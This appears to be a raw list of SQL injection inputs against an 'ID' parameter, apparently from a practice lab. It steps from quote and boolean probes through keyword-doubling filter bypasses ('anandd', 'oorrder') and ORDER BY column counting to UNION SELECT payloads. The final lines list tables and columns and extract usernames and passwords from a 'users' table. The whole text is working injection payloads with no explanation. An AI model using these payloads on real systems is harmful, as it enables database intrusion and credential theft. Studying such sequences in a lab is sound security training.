ID:1
ID:1'
ID:1 and 1=1
ID:1 and 1=2
ID:1 and 1=2
ID:1 and 1=2
ID:1 and 1=1
ID:1 anandd 1=1
ID:1
ID:1
ID:1
ID:1' 0x616e64 '1'='1
ID:1' and '1'='1
ID:1' -- 
ID:1' -- 
ID:
ID:1
ID:1'
ID:1' and '1'='1
ID:1' anandd '1'='1
ID:1' anandd '1'='1
ID:1' anandd '1'='2
ID:1' oorrder by 1-- 
ID:1' oorrder by 2-- 
ID:1' oorrder by 3-- 
ID:1' oorrder by 4-- 
ID:1' anandd 1=2 union select 1,2,3-- 
ID:1' anandd 1=2 union select 1,2,database()-- 
ID:1' anandd 1=2 union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security'-- 
ID:1' anandd 1=2 union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_schema='security' anandd table_name='users'-- 
ID:1' anandd 1=2 union select 1,2,concat_ws(',',id,username,passwoorrd) from security.users limit 0,1-- 
ID:1' anandd 1=2 union select 1,2,concat_ws(',',id,username,passwoorrd) from security.users limit 1,1-- 
ID:1' anandd 1=2 union select 1,2,concat_ws(',',id,username,passwoorrd) from security.users limit 2,1-- 
